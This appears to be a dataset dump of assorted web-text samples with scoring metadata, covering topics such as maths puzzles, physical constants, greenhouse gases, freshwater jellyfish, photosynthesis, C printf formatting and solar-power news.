text: large_string, lengths 148 to 17k
id: large_string, lengths 47 to 47
score: float64, range 2.69 to 5.31
tokens: int64, range 36 to 7.79k
format: large_string, 13 classes
topic: large_string, 2 classes
fr_ease: float64, range 20 to 157
Consider the equation 1/a + 1/b + 1/c = 1 where a, b and c are natural numbers and 0 < a < b < c. Prove that there is only one set of values which satisfies this equation. Three frogs hopped onto the table: a red frog on the left, a green in the middle and a blue frog on the right. Then the frogs started jumping randomly over any adjacent frog. Is it possible for them to. . . . The nth term of a sequence is given by the formula n^3 + 11n. Find the first four terms of the sequence given by this formula and the first term of the sequence which is bigger than one million. . . . Take any whole number between 1 and 999 and add the squares of the digits to get a new number. Make some conjectures about what happens in general. Powers of numbers behave in surprising ways. Take a look at some of these and try to explain why they are true. The picture illustrates the sum 1 + 2 + 3 + 4 = (4 x 5)/2. Prove the general formula for the sum of the first n natural numbers and the formula for the sum of the cubes of the first n natural. . . . Find the smallest positive integer N such that N/2 is a perfect cube, N/3 is a perfect fifth power and N/5 is a perfect seventh power. A serious but easily readable discussion of proof in mathematics with some amusing stories and some interesting examples. Liam's house has a staircase with 12 steps. He can go down the steps one at a time or two at a time. In how many different ways can Liam go down the 12 steps? Show that if three prime numbers, all greater than 3, form an arithmetic progression then the common difference is divisible by 6. What if one of the terms is 3? Find some triples of whole numbers a, b and c such that a^2 + b^2 + c^2 is a multiple of 4. Is it necessarily the case that a, b and c must all be even? If so, can you explain why? Take any two-digit number, for example 58. What do you have to do to reverse the order of the digits? Can you find a rule for reversing the order of digits for any two-digit number? Find the largest integer which divides every member of the following sequence: 1^5-1, 2^5-2, 3^5-3, ... n^5-n. Make a set of numbers that use all the digits from 1 to 9, once and once only. Add them up. The result is divisible by 9. Add each of the digits in the new number. What is their sum? Now try some. . . . Can you see how this picture illustrates the formula for the sum of the first six cube numbers? What happens to the perimeter of triangle ABC as the two smaller circles change size and roll around inside the bigger circle? This article extends the discussions in "Whole number dynamics I", continuing the proof that, for all starting points, the Happy Number sequence goes into a loop or homes in on a fixed point. Did you know that factorial one hundred (written 100!) has 24 noughts when written in full and that 1000! has 249 noughts? Convince yourself that the above is true. Perhaps your methodology will help you find the. . . . Explore the continued fraction: 2+3/(2+3/(2+3/(2+...))). What do you notice when successive terms are taken? What happens to the terms if the fraction goes on indefinitely? Carry out cyclic permutations of nine-digit numbers containing the digits from 1 to 9 (until you get back to the first number). Prove that whatever number you choose, they will add to the same total. The final of five articles, which contains the proof of why the sequence introduced in article IV either reaches the fixed point 0 or enters a repeating cycle of four values. Imagine we have four bags containing a large number of 1s, 4s, 7s and 10s. What numbers can we make? 
How many pairs of numbers can you find that add up to a multiple of 11? Do you notice anything interesting about your results? Can you rearrange the cards to make a series of correct. . . . Advent Calendar 2011 - a mathematical activity for each day during the run-up to Christmas. An introduction to how patterns can be deceiving, and what is and is not a proof. Can you fit Ls together to make larger versions of themselves? Imagine we have four bags containing numbers from a sequence. What numbers can we make now? Pick a square within a multiplication square and add the numbers on each diagonal. What do you notice? Choose a couple of the sequences. Try to picture how to make the next, and the next, and the next... Can you describe your reasoning? Some puzzles requiring no knowledge of knot theory, just a careful inspection of the patterns. A glimpse of the classification of knots and a little about prime knots, crossing numbers and. . . . You can work out the number someone else is thinking of as follows. Ask a friend to think of any natural number less than 100. Then ask them to tell you the remainders when this number is divided by. . . . In this 7-sandwich: 7 1 3 1 6 4 3 5 7 2 4 6 2 5 there are 7 numbers between the 7s, 6 between the 6s, etc. The article shows which values of n can make n-sandwiches and which cannot. Can you discover whether this is a fair game? This article invites you to get familiar with a strategic game called "sprouts". The game is simple enough for younger children to understand, and has also provided experienced mathematicians with. . . . When number pyramids have a sequence on the bottom layer, some interesting patterns emerge... In this third of five articles we prove that whatever whole number we start with for the Happy Number sequence, we will always end up with some set of numbers being repeated over and over again. Prove that if a^2+b^2 is a multiple of 3 then both a and b are multiples of 3. We are given a regular icosahedron having three red vertices. Show that it has a vertex that has at least two red neighbours. Problem solving is at the heart of the NRICH site. All the problems give learners opportunities to learn, develop or use mathematical concepts and skills. Read here for more information. I start with a red, a blue, a green and a yellow marble. I can trade any of my marbles for three others, one of each colour. Can I end up with exactly two marbles of each colour? From a group of any 4 students in a class of 30, each has exchanged Christmas cards with the other three. Show that some students have exchanged cards with all the other students in the class. How. . . . A paradox is a statement that seems to be both untrue and true at the same time. This article looks at a few examples and challenges you to investigate them for yourself. Prove that the internal angle bisectors of a triangle will never be perpendicular to each other. Take any rectangle ABCD such that AB > BC. The point P is on AB and Q is on CD. Show that there is exactly one position of P and Q such that APCQ is a rhombus. There are four children in a family, two girls, Kate and Sally, and two boys, Tom and Ben. How old are the children? Can you cross each of the seven bridges that join the north and south of the river to the two islands, once and once only, without retracing your steps? A composite number is one that is neither prime nor 1. Show that 10201 is composite in any base. The diagram shows a regular pentagon with sides of unit length. Find all the angles in the diagram. 
Prove that the quadrilateral shown in red is a rhombus. Points A, B and C are the centres of three circles, each one of which touches the other two. Prove that the perimeter of the triangle ABC is equal to the diameter of the largest circle.
<urn:uuid:e64d882b-51cd-4dd6-af31-c92ea9d976c0>
3.171875
1,790
Content Listing
Science & Tech.
77.146735
One should separate the question into two parts, the first of which is philosophical and the second physical. The philosophical question is resolved by understanding that there are "constants" which are just those that set the system of units, and these are constant for the simple reason that they define our conventional units. The unit-defining constants philosophically cannot change. They can only be determined relative to physical measurements using physical atoms and light, and these measurements serve to fix our units. The constants which are philosophically incapable of changing are listed below:
- The speed of light c, which defines the unit of space given the unit of time.
- Planck's constant, $\hbar$, which defines the unit of mass-energy in terms of the unit of inverse time.
- Newton's constant, which defines the unit of mass-energy in terms of the unit of space (and, in conjunction with the other two, fixes a unique unit of mass, length, and time, the Planck units).
- Boltzmann's constant, which defines the Kelvin in terms of the Joule.
- The electromagnetic constants, which define the unit of charge.
In terms of Planck units, all physical constants are dimensionless. These are the quantities which are philosophically capable of changing (see this question: units and nature). So the gravitational constant simply cannot change. It is philosophically meaningless to say that it does change. What you would really be saying is that atoms are changing size relative to Planck units. Here are some constants that can, in principle, change:
- The charge of the electron in Planck charges (the square of this is called the fine structure constant).
- The mass of the proton in Planck masses (this is more or less the exponential of the strong coupling at the Planck scale).
- The Higgs VEV: this is one unnaturally small parameter in Planck units.
- The cosmological constant: this is the other unnaturally small parameter.
The other dimensionless constants are roughly of the expected size. The electron-Higgs coupling is a bit small, so the electron is somewhat light compared to other lepton and quark masses, but to 1 part in a thousand, not one part in a billion, so it could still be a coincidence. Within string theory, all of these dimensionless constants are quantities which can change; each is associated with a particle which represents fluctuations in its value. These particles are determined by the geometry of the microscopic space-time. The constants which are constant are those whose low-energy dynamics fixes their value, so that small fluctuations return to where they started, and any change in their value requires energies of order the Planck energy. At low energies, or outside of string theory, the principle that fixes the charges and masses of the particles is renormalizability. So the reason the electron charge does not vary is that if it changed from place to place, it would be a field, and no field can couple in a renormalizable way to the photon and electron-positron fields, which are already dimension 4. The principle of renormalizability tells you that the only constants you expect to see in a quantum field theory which are natural are the dimensionless coefficients of dimension-4 interactions, like the electron charge, or macroscopic scales determined by logarithmic running, like the mass of the proton. 
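As a minimal numerical sketch of the unit bookkeeping (rounded SI values, purely illustrative), the Planck units can be built from the unit-defining constants, and the genuinely dimensionless quantities above evaluated against them:

import math

# Unit-defining constants (SI, rounded; these fix the units, not the physics):
c    = 2.998e8       # speed of light, m/s
hbar = 1.055e-34     # reduced Planck constant, J*s
G    = 6.674e-11     # Newton's constant, m^3/(kg*s^2)

# Planck units follow by dimensional analysis:
m_planck = math.sqrt(hbar * c / G)      # ~2.18e-8 kg
l_planck = math.sqrt(hbar * G / c**3)   # ~1.62e-35 m
t_planck = math.sqrt(hbar * G / c**5)   # ~5.39e-44 s

# Dimensionless quantities, the ones that could in principle vary:
e, eps0 = 1.602e-19, 8.854e-12
alpha = e**2 / (4 * math.pi * eps0 * hbar * c)
print("fine structure constant:", alpha)                      # ~1/137
m_proton = 1.673e-27
print("proton mass in Planck masses:", m_proton / m_planck)   # ~7.7e-20

Any statement that "G changes" can only cash out as a change in dimensionless ratios like the last one; the sketch just makes that dictionary explicit.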
The Higgs VEV is unnatural for this reason: it is a fine-tuned mass scale, and this suggests that there is something left that we don't understand about the Higgs mechanism, which will be sorted out once we have experimental data about the Higgs boson. The principle of renormalizability is only applicable in a scaling regime where all the energies are much lower than the Planck energy. In this regime, you also expect either Newton's constant to be truly constant, which gives Einstein's gravity, or there to be an extra massless scalar field interacting gravitationally, which gives Brans-Dicke theory. All other corrections are less relevant under renormalization, and scale away at low energies (although Einstein gravity itself is not renormalizable, it is the leading surviving scaling term at low energy, so the renormalizability principle still works). Experimentally, we know that a Brans-Dicke field cannot be operating at solar-system scales. Because of the philosophical freedom in choosing units, Brans and Dicke chose to express their theory in terms of a gravitational constant that changes from place to place. This terminology is unfortunate: they could just as easily have framed it as the speed of light changing from place to place, and had the exact same theory. It is best to keep G and c both constant, and consider their field as a new scalar field that varies from place to place, with no relation to the unit-defining constants.
<urn:uuid:c3bdbea6-b0c3-46e0-8612-8ff3b5dbfc32>
3.0625
1,013
Q&A Forum
Science & Tech.
34.552933
New presentation showing all three main greenhouse gases on one graph. Carbon dioxide's post-1990 acceleration is sustained. Methane's renewed post-2007 increase, due to planetary feedback emissions, is sustained. Nitrous oxide is still by far the fastest-rising greenhouse gas and the most powerful of the three. Mauna Loa carbon dioxide and methane have changed little since last month. Methane is still on a rising trend due to post-2007 feedback emissions from the warming planet. Nitrous oxide continues to rise. More heat is being added to the climate system at an unprecedented rate, a rate which has accelerated over the past decade due to all three GHGs. Arctic methane continues to rise due to feedback emissions. Atmospheric GHG concentrations correlate directly with radiative forcing, which shows how the total heat in the climate system increases - a much better indicator than surface temperature increase alone. Compared to the 800,000-year ice-core record, the total heat added to the climate system by the radiation of the three greenhouse gases is extremely high. Research suggests there is more heat in the climate system today than at any time in the past 15 million years. The atmospheric greenhouse gas concentrations show:
- carbon dioxide's post-2000 increased rate of increase persists,
- methane's post-2007 renewed increase, due to feedback emissions from the warming planet (Arctic and tropical peatlands), persists at the same fast rate, so it is not a temporary situation but an emergency in its own right,
- nitrous oxide is increasing the fastest, and its post-2000 increased rate of increase persists. As its GWP is nearly 300 times that of CO2, nitrous oxide is now an extreme danger.
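The concentration-to-forcing link mentioned above can be made concrete with the widely used simplified expression for CO2, ΔF = 5.35 ln(C/C0) W/m², taking the customary pre-industrial baseline of 280 ppm. A minimal Python sketch; the concentrations below are illustrative assumptions, not figures from this post:

import math

def co2_forcing(c_ppm, c0_ppm=280.0):
    """Simplified CO2 radiative forcing in W/m^2 (Myhre et al., 1998)."""
    return 5.35 * math.log(c_ppm / c0_ppm)

for c in (315, 350, 400):  # illustrative concentrations in ppm
    print(f"{c} ppm -> {co2_forcing(c):.2f} W/m^2")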
<urn:uuid:c999d879-412e-4040-871f-eaef924fbb3c>
3.53125
343
Knowledge Article
Science & Tech.
41.553235
Science subject and location tags Articles, documents and multimedia from ABC Science Monday, 22 April 2013 Average temperatures around the world in the last thirty years of the 20th century were higher than any other time in nearly 1400 years. Friday, 19 April 2013 Antarctica's abrupt deep freeze around 34 million years ago caused a plankton explosion that transformed Southern Ocean ecosystems, new research has found. Monday, 8 April 2013 A new study may have finally resolved debate on how America's famous Yellowstone supervolcano was formed. Friday, 22 March 2013 A mass extinction event 200 million years ago that wiped out half of all species on Earth was caused by volcanic activity. Thursday, 14 March 2013 Fossilised forms of a phallus-shaped invertebrate have shed light on a dramatic spurt in Earth's biodiversity that occurred half a billion years ago, a new study says. Monday, 11 March 2013 The ability of ecosystems to adapt to climate change has been put under the microscope and the news is good for tuna and tropical rainforests. Monday, 11 March 2013 Many of the world's diamonds, including most of those found in Western Australia's famous Argyle mine, may have begun as organic matter on the ocean floor, a study shows. Wednesday, 6 March 2013 ABC Open You walk on it every day but do you ever stop to think about the soil beneath your feet? Luckily there are scientists who do. Thursday, 28 February 2013 Craters caused by asteroid or comet impacts may have played an important role in the creation and evolution of life, say Australian scientists. Monday, 18 February 2013 Ask an Expert Is the process that is at the origin of coal still existent, why or why not, and where does proof of it exist? Friday, 15 February 2013 One of the largest ancient asteroid impact zones on Earth has been discovered in outback Australia. Thursday, 14 February 2013 Scientists studying a bulge on the Earth's surface where the crust is missing have found the exposed mantle contains more magnesium than usual, making it lighter. Tuesday, 4 December 2012 Great Moments in Science Thawing permafrost could release an enormous amount of carbon dioxide and methane into the atmosphere. And the more it warms, the more greenhouse gases are released, writes Dr Karl. Friday, 23 November 2012 A South Pacific island identified on Google Earth and world maps does not exist. Monday, 19 November 2012 New Zealand's Mount Ruapehu is in danger of erupting as pressure builds in a subterranean vent, officials warn.
<urn:uuid:f08841b4-8351-4247-83d6-7720785eaa8b>
3
538
Content Listing
Science & Tech.
47.965657
Mysterious world of RNAs: CIRCULAR RNAs Regulating MicroRNAs The world of RNAs does not seem to stop surprising us, the latest surprise being circular RNAs controlling gene expression. In the past few decades we have come across many non-traditional RNAs. Some were very short, some surprisingly long, and some influenced gene expression by blocking other RNAs from being translated into protein. However, one thing common to all of these RNAs was their linear form. A few circular RNAs had been reported in plants and animals, but they were dismissed as genetic errors or experimental artefacts. Two recently published articles in the journal Nature describe how a new form of highly stable circular RNA acts as a molecular 'sponge', binding to and blocking tiny gene modulators called microRNAs. MicroRNAs (miRNAs) are important post-transcriptional regulators of gene expression that act by direct base pairing to target sites within untranslated regions of messenger RNAs. The discovery of circular RNAs once again proves that there is much more to RNA than a simple messenger between DNA and the proteins it encodes. To study circRNAs systematically, Nikolaus Rajewsky's group sequenced and computationally analysed human, mouse and nematode RNA and detected thousands of well-expressed, stable circRNAs, often showing tissue- or developmental-stage-specific expression. The work also clearly shows that a human circRNA, antisense to the cerebellar degeneration-related protein 1 transcript (CDR1as), is densely bound by microRNA (miRNA) effector complexes and harbours 63 conserved binding sites for the ancient miRNA miR-7. To functionally validate CDR1as, the authors expressed human CDR1as in zebrafish embryos, which disrupted midbrain development, a phenotype reproduced by loss of miR-7, suggesting that CDR1as is a miRNA antagonist. 1. Circular RNAs are a large class of animal RNAs with regulatory potency. Memczak S, Jens M, Elefsinioti A, Torti F, Krueger J, Rybak A, Maier L, Mackowiak SD, Gregersen LH, Munschauer M, Loewer A, Ziebold U, Landthaler M, Kocks C, le Noble F, Rajewsky N. Nature. 2013 Feb 27. doi: 10.1038/nature11928 2. Natural RNA circles function as efficient microRNA sponges. Hansen TB, Jensen TI, Clausen BH, Bramsen JB, Finsen B, Damgaard CK, Kjems J. Nature. 2013 Feb 27. doi: 10.1038/nature11993
<urn:uuid:700882d9-f266-4ec4-9256-a323cdfb84f3>
3.21875
584
Nonfiction Writing
Science & Tech.
42.228745
How do you predict fog? First, fog is simply a cloud at ground level. It's formed by water vapor cooling and condensing. Forecasters look for wet ground, light wind or no wind and clear skies. The clear skies and light winds allow the cooling needed to condense water vapor (from the wet ground) into the tiny water droplets that make up fog.
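Those same ingredients can be written down as a toy decision rule. A minimal Python sketch, with assumed illustrative thresholds (wind at or below about 5 knots, air within about 2 degrees C of its dew point, mostly clear skies); this is not an operational forecasting method:

def fog_likely(temp_c, dewpoint_c, wind_knots, cloud_cover_pct, ground_wet):
    """Toy heuristic: air cooling to its dew point under calm, clear conditions."""
    near_saturation = (temp_c - dewpoint_c) <= 2.0   # little cooling needed to condense
    light_wind = wind_knots <= 5                     # calm air, little mixing
    clear_sky = cloud_cover_pct <= 25                # clear skies allow radiative cooling
    return ground_wet and near_saturation and light_wind and clear_sky

print(fog_likely(10.0, 9.0, 3, 10, True))   # True: a classic radiation-fog setup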
<urn:uuid:ba6f8c3d-1513-4cce-9919-2d0de7e6e8db>
3.234375
77
Knowledge Article
Science & Tech.
78.560286
Name: Catherine Barber How do you explain the oxidation process when combining energy, carbohydrates, protein, and fats? How is oxidation also related. . . . Any oxidation process involves the loss of electrons from atoms, and usually the combination of other atoms with oxygen in the process. Oxidation is the chemical process by which cells "get" their energy from the foods that we consume. After oxidation, the foods are left with less available chemical energy, and we pass those leftovers out of the body as waste. Breathing gives us the oxygen needed for the oxidation that constantly occurs in all of our cells to provide the energy that keeps us alive. Let me know if you'd like more details. Update: June 2012
<urn:uuid:b434d20e-5bb4-4f63-9944-d88d468fab80>
3.09375
161
Q&A Forum
Science & Tech.
29.496313
Color Your World Color the picture by clicking on a color swatch at the bottom of the image, then click on the image where you want to apply that color. Color off-line by downloading and printing the pdf version. The sun is unique. It is among the top 10% (by mass) of stars in its neighborhood. It has the ideal size to support life on earth. It is a single star, whereas most stars exist in multiple-star systems; a planet in a multiple-star system would suffer extreme temperature variations. It is the primary heat source for our weather. Learn more about weather and weather safety in JetStream - An Online School for Weather.
<urn:uuid:27619205-662a-4e6b-a1ce-c127a37dcbc0>
2.71875
136
Tutorial
Science & Tech.
65.862077
Discover the cosmos! Each day a different image or photograph of our fascinating universe is featured, along with a brief explanation written by a professional astronomer. December 20, 1998 Explanation: Is our Galaxy this thin? We believe so. The Milky Way, like NGC 891 pictured above, has the width of a typical spiral galaxy. Spirals have most of their bright stars, gas, and obscuring dust in a thin disk. This disk can be so thin that the spiral galaxy appears edge-on like a compact disk seen sideways. The dark band across the middle is a lane of dust which absorbs light. Some of the billions of stars that orbit the center of NGC 891, however, appear to be moving too fast to just be traveling in circles. What causes this peculiar motion? One hypothesis is that NGC 891 has a large bar across its center -- a bar that would be obvious were we to see this galaxy face-on instead of edge-on. This false-color picture was constructed from 3 near-infrared images.
<urn:uuid:fe9901a8-8bd1-48fc-b02b-b1a4e7dbe1a5>
3.984375
250
Knowledge Article
Science & Tech.
63.119069
In our earlier post we discussed why the bound they put forward was based on weak argumentation. The essential point was the assumption that the highest-energy photon had been emitted during a particular late peak in the low-energy spectrum. Since that peak almost coincided with the arrival of the photon, the resulting bound was very strong. There is, however, no knowing exactly when the photon was emitted. The most plausible assumption is that it wasn't emitted before the onset of the burst in the low-energy regime. This assumption, however, gives a much weaker bound, pretty much exactly at the Planck scale. The paper has now been published in Nature, but it is significantly toned down from the original claim. The "most secure and conservative new limit" is at 1.2 times the Planck scale. The limit of 102 times the Planck scale that arises from associating the 31-GeV photon with the 7th spike is still offered, but explained to be "not very secure." Seems to me the referees did a good job... The topic even made it into the New York Times. Dennis Overbye writes that 7.3 Billion Light-Years Later, Einstein's Theory Prevails, and quotes the eternally optimistic Lee Smolin: The good news, astronomers said, is that more data expected from Fermi could decide the question. As Lee Smolin, a quantum gravity theorist from the Perimeter Institute for Theoretical Physics in Waterloo, Ontario, said, "So a genuine experimental test of a hypothesized quantum gravity effect is in progress." New Scientist reports on Giovanni Amelino-Camelia's stomach aches, and Symmetry Magazine explains the why and how in a very recommendable article, Gamma-ray burst restricts ways to beat Einstein's relativity. For more details, see also our earlier post Constraining Modified Dispersion Relations with Gamma Ray Bursts.
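For a sense of where numbers like "1.2 times the Planck scale" come from, the linear-dispersion bound is roughly E_QG ≳ E_photon × (travel time)/(arrival delay). A rough Python estimate, ignoring the proper cosmological redshift integral and assuming a 0.8 s emission-lag allowance purely for illustration:

# Order-of-magnitude bound on the quantum-gravity scale from one GRB photon.
E_photon_GeV  = 31.0              # highest-energy photon of the burst
travel_time_s = 7.3e9 * 3.15e7    # ~7.3 billion years of flight time, in seconds
delay_s       = 0.8               # assumed allowance for the photon's emission lag

E_qg_GeV = E_photon_GeV * travel_time_s / delay_s
E_planck_GeV = 1.22e19
print(E_qg_GeV / E_planck_GeV)    # ~0.7: the bound lands right around the Planck scale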
<urn:uuid:78032ba1-48f0-45b9-8dcb-0478ed553bc6>
2.6875
384
Personal Blog
Science & Tech.
46.713763
Two ideas have been advanced which use the idea of giving hints to the compiler without changing the Fortran file semantics. The first is based on the observation that although the distribution of an array when it is written may be available to the compiler or runtime system, the distribution into which that array will be read cannot generally be known, even though the programmer may have this knowledge. So the proposal is to provide, on a write, a hint about how the data will be read.

!HPF IO_DISTRIBUTE * :: a
WRITE a, b, c
!HPF IO_DISTRIBUTE * :: b

When an array is written, it can be easily read back in the given distribution. The annotation can be associated with either the declaration or the write itself; in the first case it applies to all writes of the array, while in the second it only applies to the one statement. The intent is that meta-data is kept in the file system to record the "right" data layout. The advantages of this proposal include notation and efficiency. The second proposal is to give hints about the physical layout (number of spindles, record length, striping function, etc.) of the file when it is opened. This uses the HPF array mapping mechanisms. (A file is a 1-dimensional array of records.) The syntax needs a "name" for the file "template": we suggest FILEMAP. The programmer can align/distribute FILEMAP (on I/O nodes), associate FILEMAP with a file on OPEN, etc. There are no changes in semantics or file system.
<urn:uuid:cbc626fb-187c-43c6-b1e4-21ec9322a0d2>
2.890625
347
Documentation
Software Dev.
51.432019
Electron Transport in Photosynthesis The above illustration draws from ideas in both Moore et al. and Karp to outline the steps in the electron transport process that occurs in the thylakoid membranes of chloroplasts during photosynthesis. Both Photosystems I and II are utilized, with water split to supply electrons. Electron transport helps establish a proton gradient that powers ATP production and also stores energy in the reduced coenzyme NADPH. This energy is used to power the Calvin Cycle to produce sugar and other carbohydrates. The electron transport process outlined here is characteristic of the approach to photophosphorylation called "non-cyclic electron transport". There is also a cyclic electron transport process, which uses only Photosystem I to produce ATP without providing the reduced coenzymes necessary to proceed with further biosynthesis.
<urn:uuid:c6e8a278-0c0b-4a7e-861c-cd7cda3a37a1>
3.28125
178
Knowledge Article
Science & Tech.
23.958234
We may be hundreds of miles away from the nearest ocean, but the Show-Me-State has jellyfish. Swimmers and skiers need not be alarmed, however. Although the tentacles of freshwater jellyfish are armed with stinging cells like those of their saltwater cousins, Missouri's freshwater jellyfish are only about the size of a quarter and pose no threat to people. The tiny stinging cells on the tentacles of freshwater jellyfish are used to paralyze microscopic animals in the water called zooplankton. The jellyfish then consume these immobilized prey for nourishment. Freshwater jellyfish, Craspedacusta sowerbyi, likely originated in China, but the species was first described by a researcher in England in 1880. It has been reported in lakes, old quarries and ponds in the United States for over 100 years. Biologist Rudolf Bennitt provided the first Missouri record of freshwater jellyfish in 1930; however, people continue to be amazed when they encounter this invertebrate in Missouri waters. Some of the mystery associated with freshwater jellyfish can be attributed to the life cycle of this organism. Freshwater jellyfish spend much of their lives in an inconspicuous polyp stage on the bottom of lakes and tributary streams. Polyps are minute creatures, less than one-eighth-inch long, and live in colonies attached to underwater snags, logs and other structure. The polyps feed on a variety of other organisms, including zooplankton, worms and even larval fish. The polyps reproduce asexually by budding. Asexual budding is a process by which an outgrowth of cells from the body wall of one individual develops into a new individual with an identical genetic makeup. When polyps bud, the process usually results in production of more polyps, much like the process by which a strawberry plant sends out runners that develop into new plants. However, when environmental conditions are just right, polyps can produce buds that develop into medusae: free-swimming jellyfish. Unlike polyps, jellyfish represent a sexual stage in the life cycle, similar to the flowers of a strawberry plant. The jellyfish is umbrella-shaped, and its bell is fringed with numerous tentacles. By contracting its bell, the jellyfish moves rhythmically up through the water column until it reaches the surface. Then, it floats downward with tentacles extended to capture prey. Each jellyfish is either male or female, and they eventually release eggs and sperm into the water. Their fusion produces a fertilized egg that sinks to the lake bottom and develops into new polyps, starting the cycle over again. How much freshwater jellyfish affect the productivity of a fishery is unclear. When jellyfish are placed into an aquarium containing fish, the fish readily attempt to eat them but then quickly reject them. Anglers have reported a decrease in fishing success when jellyfish were present. Also, fin damage and death of young fish due to contact with the tentacles have been observed in the laboratory. On the other hand, it appears crayfish find freshwater jellyfish appealing. When we put jellyfish into aquaria containing crayfish, the crayfish consumed the jellyfish like children eating popcorn. Little is known about environmental factors that trigger production of freshwater jellyfish. Their occurrence is unpredictable. Large numbers appear like snowflakes in the water during some years but may not reappear until several years later, or not at all. 
In Missouri, during years when jellyfish are present, look for them from July through September, when surface water temperatures are near 80 degrees. Freshwater jellyfish are yet another example of the diverse and fascinating aquatic fauna inhabiting waters of the Show-Me-State.
<urn:uuid:f1e143fd-f80a-4fbc-a7dc-df70eaab0137>
3.640625
768
Knowledge Article
Science & Tech.
33.848446
1) You have specified the width as %5x, but there is a rule regarding the width specifier in C: if the width of the number to be printed is greater than the assigned width, the width specifier is ignored. So in the last column the content can't be represented in the assigned width of 5, and the width limit has been ignored. Why the width is greater than 5 is explained in point 3. Point 2 covers %x vs. unsigned char.

2) You have declared the variable 'n' as an unsigned char, but you have used %x, which is for an unsigned hexadecimal int. So at the time of printing, the value of n is promoted, or loosely speaking typecast, to an unsigned hexadecimal integer. This is not unique to the combination of unsigned char and %x. Try different combinations on your compiler: with int a = -5 you will get -5 via %d, while %u gives some other interpretation that depends on whether the compiler is 16-bit or 32-bit. If you instead write unsigned int a = -5, the result is still the same as before. In the first case you write int a = -5 and in the second case unsigned int a = -5, but the result depends on the interpretation you request: when you write %x, you yourself tell the compiler to interpret the bits as an unsigned hexadecimal int. This is about typecasting, or, if you like, about interpretation by the compiler. I hope it's clear now; if not, I suggest you run slightly different programs, on several compilers, like int x = 7; printf("%f", x); and so on. You will surely get the point.

3) Now I explain why the output in the last column is fffffffe. Consider the first run of the loop, where n = 0x1. With a 32-bit compiler it is represented in memory as 0000 0001, since a char is given 1 byte of memory. But when it is typecast as an unsigned hexadecimal integer, the interpretation on a 32-bit compiler is 0000 0000 0000 0000 0000 0000 0000 0001. Whether you declare int n = 1, unsigned int n = 1, or int n = 0x1, the representation is the same; even with unsigned char n = 1, the rightmost digit is 1 and all the others zero, although the number of zeros is smaller. Now, in your loop statement, by writing %x you tell the compiler to interpret the content as an unsigned hexadecimal int, so the compiler provides space for it as such, and performing the operation ~n flips the bits to 1111 1111 1111 1111 1111 1111 1111 1110. (Caution: printf("%d", ~n) is different from printf("%d", n++); in the n++ case the value of the variable in memory gets updated too, whereas printf("%d", ~n) is like printf("%d", n + 8) in that n itself is unchanged.) With this new representation, all bits are 1 except the rightmost, so it gets printed as fffffffe. Simple!

4) You have written "but it seems like it's being cast to a signed 32 bit value and sign extended by the %5x specifier." But %x is not for a signed hexadecimal int; %x is for an unsigned hexadecimal int, so there is no point in assuming that a minus sign got truncated.

5) In your program you have used '~n'; just for experiment's sake, also check different versions like '-~n' or '-n'.
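A quick way to see the fffffffe result outside of C: a small Python check (only an illustration; Python integers are unbounded, so the 32-bit view is emulated with a mask):

n = 0x1
print(hex(~n & 0xFFFFFFFF))   # 0xfffffffe: the 32-bit view that %x prints in C
print(hex(~n & 0xFF))         # 0xfe: what a char-sized, 8-bit view would show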
<urn:uuid:257be97d-5042-403d-a2ad-1da37f0bee81>
3.5
798
Q&A Forum
Software Dev.
72.035207
The polar bear is an animal admired around the world for its looks and cute appearance. Anyone who has never seen one of these animals in the wild would link them with the polar bears in the Coca-Cola commercials. Don't let these cute-looking animals fool you, as anyone who has seen them in the wild will tell you: these creatures are yet to be fully understood. Research is currently underway on the effects of global warming on the lives of the polar bear. Their behavior patterns are sometimes hard to understand, but sometimes it appears they are smarter than we think. The research in this article concerns the effect of global warming on the survival of the polar bear, and the adaptation it may demand of the polar bear could be impossible. Polar bears starve themselves from summer till autumn due to lack of food, and warmer periods lasting longer threaten to extend this period of starvation. During the winter the polar bear does most of its feeding. They go out on the frozen waters hunting for their favored prey, ringed seal pups. This is done by waiting near a hole in the ice for the pups to come up for air; then, with one bite, dinner is theirs. Global warming is also affecting the people who live in the nearby towns, as it means the bears will be spending more time on the mainland. This could be a serious problem, as they have been known to cause large amounts of damage when they stray into towns.
<urn:uuid:6e28e6b4-3fa1-4c8d-a1df-d386da823c0b>
3.15625
327
Knowledge Article
Science & Tech.
65.218333
Hugging the horizon, a dark red Moon greeted early morning skygazers in eastern Atlantic regions on December 21, as the total phase of 2010's Solstice Lunar Eclipse began near moonset. This well-composed image of the event is a composite of multiple exposures following the progression of the eclipse from Tenerife, Canary Islands. Initially reflecting brightly on a sea of clouds and the ocean's surface itself, the Moon sinks deeper into eclipse as it moves from left to right across the sky. Opposite the Sun, the Moon was immersed in the darkest part of Earth's shadow as it approached the western horizon, just before sunrise came to Tenerife.
<urn:uuid:622a9810-54ee-40f0-96ba-e85d69803ac9>
2.859375
143
Truncated
Science & Tech.
27.145657
The unconfined aquifer is the major source of water supply in west-central and southwestern Delaware. The aquifer, which is composed of quartz sand, gravel, clay, and silt, ranges in thickness from 20 to 200 feet. The water table ranges from land surface to about 20 feet below land surface. Analyses of water from wells distributed throughout the area were used to study processes controlling the chemical quality of the water in the unconfined aquifer. Please give proper credit to the Delaware Geological Survey. Delaware Geological Survey University of Delaware Delaware Geological Survey Building Newark, DE 19716 Mon - Fri; 8:00am to 4:30pm
<urn:uuid:558e54dd-6b9c-4258-895e-270720a29124>
3.46875
141
Knowledge Article
Science & Tech.
32.792231
According to the Los Angeles Times, L.A. Mayor Antonio Villaraigosa is advocating a proposal to install enough rooftop solar panels on buildings in the city by 2013 to power 100,000 households now served by the Department of Water and Power (DWP). According to MSNBC, a team led by former NASA executive and physicist John Mankins captured solar energy from a mountaintop in Maui and beamed it 92 miles to the main island of Hawaii. The long-range energy transmission experiment opens the possibility of sending solar energy from space to earth. Montgomery County Public Schools (MCPS) announced it will install solar photovoltaic (PV) systems on the roofs of several schools. This initiative will make MCPS the first school system in Maryland and the Washington, D.C., metropolitan area to launch a large-scale solar PV program. The Massachusetts Institute of Technology (MIT) recently reported a couple of developments that may help solar power enter the mainstream market. In one project, MIT reported new photovoltaic cells could be placed on windows without inhibiting views or light passage. According to USA Today, new technology developed by Silicon Valley startup SUNRGI could fast-track solar power by delivering it to the market in a year's time at a price comparable to coal-fired electricity. In June 2008, San Francisco Mayor Gavin Newsom helped the city achieve a first when he signed a bill recently approved by the Board of Supervisors. Officials are touting the GoSolarSF program as the first-ever and largest solar program of its kind offered by a city in the country. A debate within political circles in the historic town of Marburg, Germany, and its regional government in Giessen pits the environmentally conscious against the very environmentally conscious and highlights the question of where to draw the line when it comes to mandating energy efficiency. PPL Renewable Energy announced plans in May 2008 to design, construct and operate a 1.7-megawatt 